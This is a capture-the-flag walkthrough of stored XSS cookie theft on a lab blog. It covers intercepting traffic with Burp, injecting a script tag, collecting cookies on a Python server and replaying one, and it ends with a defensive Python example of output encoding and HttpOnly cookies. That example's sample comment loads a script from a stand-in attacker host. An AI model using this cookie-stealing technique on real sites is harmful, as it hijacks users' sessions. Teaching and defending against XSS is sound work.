CYCA2014 Walkthrough - Om nom nom nom

Flag 2: Om-nom-nom-nom



In this challenge we need to gain access to the blog as a registered user. At the moment we can only view the blog as a guest.
First we enter the blog as a guest and click the link for an available post, making sure to set the vip flag to "1" while intercepting the traffic with Burp Suite.



After clicking that, a comment section with a textarea became available. It could potentially have a cross-site scripting vulnerability, so it was worth testing. Some instructions on how to customise comments were also given, as follows.



Cross-site scripting could be tested for each of these scenarios.




And finally the last one gave a positive result.



Now that XSS is confirmed, it is possible to inject a script that grabs the cookies. We can collect them using Python's SimpleHTTPServer on Kali. First a JavaScript file needs to be made.



The next step is to host a site that receives the stolen cookies.



Now a script tag linking to our payload can be injected.



And obtain the cookie.





However, the cookie obtained was our own, but some unidentified cookies were also obtained.




This cookie could then be inserted into the cookie jar.



When the page is reloaded, the following page appears.



We are now viewing as a registered user. The second flag is captured.
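The two root causes this walkthrough exploits are a comment body echoed into the page without output encoding and a session cookie that script can read. As an added defensive example that is not part of the original walkthrough, the Python below shows the unsafe rendering beside the encoded version, and a Set-Cookie header with HttpOnly; the comment text and the attacker host name are constructed placeholders.

```python
import html
from http.cookies import SimpleCookie

# Constructed sample comment: an injected script tag pointing at a
# hypothetical external host, the same shape as the payload link above.
SAMPLE_COMMENT = '<script src="http://attacker.example/grab.js"></script> nice post!'


def render_comment_vulnerable(comment: str) -> str:
    """The bug: the comment is dropped into the HTML as-is, so any tags
    in it are parsed and executed by every visitor's browser."""
    return f'<div class="comment">{comment}</div>'


def render_comment_fixed(comment: str) -> str:
    """Fix 1: HTML-encode on output so '<', '>', '&' and quotes are shown
    as text instead of being interpreted as markup."""
    return f'<div class="comment">{html.escape(comment, quote=True)}</div>'


def session_cookie_header(session_id: str) -> str:
    """Fix 2: mark the session cookie HttpOnly so document.cookie cannot
    read it even if a script does run; Secure and SameSite limit where
    the browser will send it."""
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["samesite"] = "Strict"
    jar["session"]["path"] = "/"
    return jar.output(header="Set-Cookie:")


def is_script_neutralised(rendered: str) -> bool:
    """True when no live <script tag survives in the rendered HTML."""
    return "<script" not in rendered.lower()


if __name__ == "__main__":
    print(render_comment_vulnerable(SAMPLE_COMMENT))
    print(render_comment_fixed(SAMPLE_COMMENT))
    print(session_cookie_header("constructed-session-id"))
```

Output encoding is what removes the injection point; HttpOnly is defence in depth so that a script which does run still cannot read the session cookie.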